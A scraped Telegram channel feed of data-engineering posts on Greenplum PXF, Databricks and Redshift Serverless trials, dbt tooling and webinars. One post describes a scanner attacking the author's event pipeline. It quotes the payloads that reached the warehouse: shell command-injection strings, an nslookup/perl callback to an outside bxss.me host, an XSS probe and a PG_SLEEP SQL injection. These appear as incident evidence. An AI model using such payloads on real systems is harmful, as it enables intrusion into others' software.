Data Apps Design
1.54K subscribers
143 photos
2 videos
41 files
231 links
В этом блоге я публикую свои выводы и мнения на работу в Data:

— Data Integration
— Database engines
— Data Modeling
— Business Intelligence
— Semantic Layer
— DataOps and DevOps
— Orchestrating jobs & DAGs
— Business Impact and Value
Download Telegram
Сегодня хотел бы поговорить о широко распространенной СУБД Greenplum и, в частности, о Platform Extension Framework (PXF) - расширении, с помощью которого открываются почти неограниченные возможности интеграции с множеством внешних систем и форматов данных.

В этой публикации Вас ждет:

– Основные возможности PXF, конфигурация, способы оптимизации.
– Организация Extract - Load с помощью PXF (Data Lake / OLTP).
– Объединение локальных и внешних таблиц в запросах (Federated queries).
– Запись данных во внешние системы (Clickhouse).

Читать на Хабр →

#pipelines #ELT #dwh #greenplum #pxf
Ух, как же много материала, которым хочется поделиться.

Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData

Будете ждать? 🤔
Somebody is overwhelming our analytics trying to find security breaches.

A brief infrastructure setup: we gather user events data in mobile apps (iOS, Android) and Web via Snowplow trackers, send it to Kafka queues, then land the data into DWH (Redshift) staging area.

Looks like a vulnerability scanner is used. Take a look at the sample data:

echo bvazvs$()\ igzdlg\nz^xyu||a #' &echo bvazvs$()\ igzdlg\nz^xyu||a #|" &echo bvazvs$()\ igzdlg\nz^xyu||a #
bxss.me/t/xss.html?%00
`(nslookup hitxbheyywgyq5e37d.bxss.me||perl -e "gethostbyname('hitxbheyywgyq5e37d.bxss.me')")`
aUV52Y1o' OR 826=(SELECT 826 FROM PG_SLEEP(15))--
^(#$!@#$)(()))******

Despite basic checks are enforced (non-empty string, valid json), around 1k events managed to get into DWH 😐

What I've done so far:

1. Filtered out and deleted problem rows from database
2. Enforced data type checks

Curious case. Finally I have faced with tech pirates 😵‍💫

Let's see if it works fine. Any other ideas?
Data Apps Design
Ух, как же много материала, которым хочется поделиться. Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData Будете ждать? 🤔
Получил отказ

"Немного деталей, которые повлияли на наше решение:
То что вы применяете бест практики из разработки - это отлично, но для нашей конференции в докладе все же не хватает технического наполнения. Возможно, это потому что мы нацелины больше на инженеров, которые уже очень хорошо знакомы со системой контроля версий, CI/CD и вот это вот все. Нам кажется, что для нашей целевой аудитории доклад не будет иметь прикладной полезности."

Технические детали это: "Я говорила про различные вариации b-tree в движках, как пример того, насколько глубокие технические подробности нам интересны"

B-tree в аналитических СУБД и больших данных в 2022... Бугага 😂

Есть идеи, на какой RU конфе готовы слушать про Modern Data Stack / Analytics Engineering?
Про Сoalesce в курсе, но в этом году уже поздно.
Databricks + Wheely Proof of Concept

I will be assessing Databricks as our new data platform (to succeed AWS Redshift)

– Requirements to E - L - T
– Current setup description
– Proof of Concept plan

Desired business impact:

– Cost effective (at least compared to what we currently spend on AWS Redshift reserved flat rate)
– Performance gains desired
– Extended features support (H3, in-database ML, Advanced analytics, ...)
– Access to ecosystem (docs, solutions, code examples, how-to guides)
– Democratization of access to data and data-related services: built-in Notebook experience
– No degradation (performance, outage, timeouts, job failures) in comparison with current state

🌐 @data_apps | Навигация по каналу
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11😍1
Data Apps Design
Databricks + Wheely Proof of Concept I will be assessing Databricks as our new data platform (to succeed AWS Redshift) – Requirements to E - L - T – Current setup description – Proof of Concept plan Desired business impact: – Cost effective (at least…
Very interesting. But what lacks in AWS Redshift?

AWS Redshift is really good. However
– Sometimes it seems to lack certain features (read GeoJSON, index geo data via H3 lib).
– It takes ~10 seconds to parse any query for the first time.
– I've faced with a couple of internal bugs (no. much affecting workloads, but still).
– I want to explore if I can save some costs if I use serverless solutions (pay as much as you have consumed compute resources).
– Using OSS formats like Parquet / Delta files might be beneficial

And I want to trial something else 😃🤔
👍42😁1🤔1
26 октября (среда) в 20:00 проведу вебинар:

Работа с ГЕО-данными в DWH: координаты, зоны, агрегация

– Привязка событий к зонам на карте города
– Агрегирование и аналитика данных с помощью H3 (гексагоны)
– Оптмизация расчетов и производительности, кэширование

Расскажу подробно, как это устроено в проекте Wheely, над которым я работаю.
Как и зачем индексировать данные (например, с использованием библиотеки H3 от Uber).
Выполнение гео-операций, проверка вхождения точки в конкретные зоны (аэропорты, вокзалы, ТЦ, районы города).

⬇️ Ссылка на YouTube-трансляцию будет в этом канале

🌐 @data_apps | Навигация по каналу
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥6
Новая публикация на Хабр ⬇️⬇️⬇️
Важнейшие критерии при выборе Extract – Load решения для интеграции данных в DWH

В публикации резюмирую свои знания:

— Каталог поддерживаемых источников и приемников данных.
— Метод чтения данных из источников (Extract).
— Способы репликации в целевое Хранилище (Load).
— Работа с изменениями структуры данных (Schema Evolution).
— Трансформации перед загрузкой данных (EtLT).
— Тип развертывания решения (Deployment).

Буду объяснять и показывать примеры на сервисах, которые использовал сам: Hevo Data, Fivetran, Airbyte. Однако критерии универсальны и применимы для любых других систем подобного класса.

Читать на Хабр →

#Pipelines #ELT

🌐 @data_apps | Навигация по каналу
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7👍3
Databricks - пока понятно то, что ничего непонятно

Пробую Databricks
– Установка в свой аккаунт AWS, сделать может только администратор (это не я) - ОК
– Развертывание в Cloud Formation Stack в пару кликов, вроде удобно. Однако очень сложно понять, что происходит и зачем: S3, IAM, Lambda, CopyZips(??)
– Сразу поднялись 3 жирных EC2 Instances i3.xlarge (зачем??), явным образом меня об этом не спросили, это не было очевидно
– Очень много текста в документации, но хочется поглотить всё

Кто пользуется Databricks?
Какие самые главные советы можете дать?
21 ноября (понедельник) в 20:00 проведу вебинар:

🚀 Аналитика продуктивности команд разработки на основе данных Github 🚀

Вы узнаете:
🔹 Каким образом собирать события организации из Github (Webhook, Airbyte)
🔹 С помощью чего осуществить парсинг, трансформации, сборку витрин данных (dbt)
🔹 Как приготовить метрики: PR Rate, Time to Review / Merge (Looker)

Кому подходит:
🔹 Начинающим и продолжающим специалистам в области Аналитики данных, Data Engineering
🔹 Тем, кто интересуется современными подходами организации Хранилищ Данных
🔹 Руководителям команд разработки, менеджерам и даже CTO

Результаты:
🔹 Познакомитесь с современными инструментами организации DWH
🔹 Поймете, как устроены процессы разработки ПО в современных компаниях
🔹 Получите понимание, какие метрики интересуют руководителей разработки

Регистрация по ссылке →

⬇️ Ссылка на YouTube-трансляцию будет в этом канале за час до начала

#webinars

🌐 @data_apps | Навигация по каналу
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥2
Data Apps Design
21 ноября (понедельник) в 20:00 проведу вебинар: 🚀 Аналитика продуктивности команд разработки на основе данных Github 🚀 Вы узнаете: 🔹 Каким образом собирать события организации из Github (Webhook, Airbyte) 🔹 С помощью чего осуществить парсинг, трансформации…
🚀 Аналитика продуктивности команд разработки на основе данных Github 🚀

🔹 Запись вебинара в YouTube: https://youtu.be/Y_xGZzI5sNI

🔹 Слайды: https://docs.google.com/presentation/d/187qBQGZWYpCkBAptNCCgHr8YZonMuHuwiZ6GlN5XMBY/edit?usp=sharing

🌐 @data_apps | Навигация по каналу
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
💎 Операционализация аналитики c инструментами класса reverse ETL – опыт использования Census 💎

В публикации:

— Место reverse ETL в схеме потоков данных
— Потребность в решении задач операционной аналитики
— Различные способы организации reverse ETL
— Кейс: Census для синхронизации данных в Pipedrive CRM

Сегодня Операционная аналитика и практики reverse ETL - не столько дань моде, сколько насущная потребность многих компаний. Создать идеальное Хранилище мало, ведь данные создают ценность только тогда, когда вы способны их использовать.

Читать на Хабр →

#Pipelines #reverse-ETL

🌐 @data_apps | Навигация по каналу
Please open Telegram to view this post
VIEW IN TELEGRAM
4👍1
🚀 Released myBI dbt Core and myBI Market showcase

⚙️ myBI dbt Core module allows quick start transformations on top of data synced by myBI Connect along with multiple useful macros.

— Supported Adapters: Clickhouse, PostgreSQL
— Reference any data source as simple as select * from source('general', 'dates')
— Build staging layer in one command with filters on account_id applied, pre-join with date dimension, comprehensive data testing (unique, not_null, relationships)
— Leverage macros: source_filter_rows to limit rows for dev/test environments, any macro from dbt_utils package

⚡️ myBI Market showcase guides you through building Modern Data Stack analytics:

— Configure environment
— Install and configure mybi_dbt_core package
— Configure data sources
— Build staging layer models
— Model Data Marts
— Visualize on a dashboard
— Publish dbt project docs
— Introduce Continuous Integration

Check it out and leave your comments and questions in Tg discussions.

I will follow up with detailed publications on Habr soon.

🌐 @data_apps | Навигация по каналу
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7🤩1🏆1
Finishing a new Analytics Engineering Lab on Github

🚀 DWH powered by Clickhouse and dbt

– Build DWH powered by Clickhouse and dbt
– Deploy Infrastructure as Code with Terraform and Yandex.Cloud
– Instant development with Github Codespaces
– Assignment checks with Github Actions

#lab #modeling #dbt #iac
👍4🔥2
⚡️ I have run a Proof of Concept with Redshift Serverless

And here's the summary:

— Reserving Redshift nodes is the best option given specific usage patterns.
— Reserved nodes are 30% cheaper than on-demand ones.
— Serverless doesn't show stable and production-ready results: faced with multiple query failures during data refresh.
— Moreover, Serverless will definitely cost more with the same usage patterns.

Read more →

#dbt #redshift #database #serverless

🌐 @data_apps | Навигация по каналу
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31🔥1
Why I use dev containers?

How to package dbt and dependencies to a reproducible container

– works almost instanty for you and team members
– latest stable dbt + adapter versions
– easy inividual secrets set up
– configuring multiple dbt targets
– fancy terminal: zsh + git plugin + shell history

+ 30 second gif live demo

Read more →

#dbt #dev #container

🌐 @data_apps | Навигация по каналу
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥31🍓1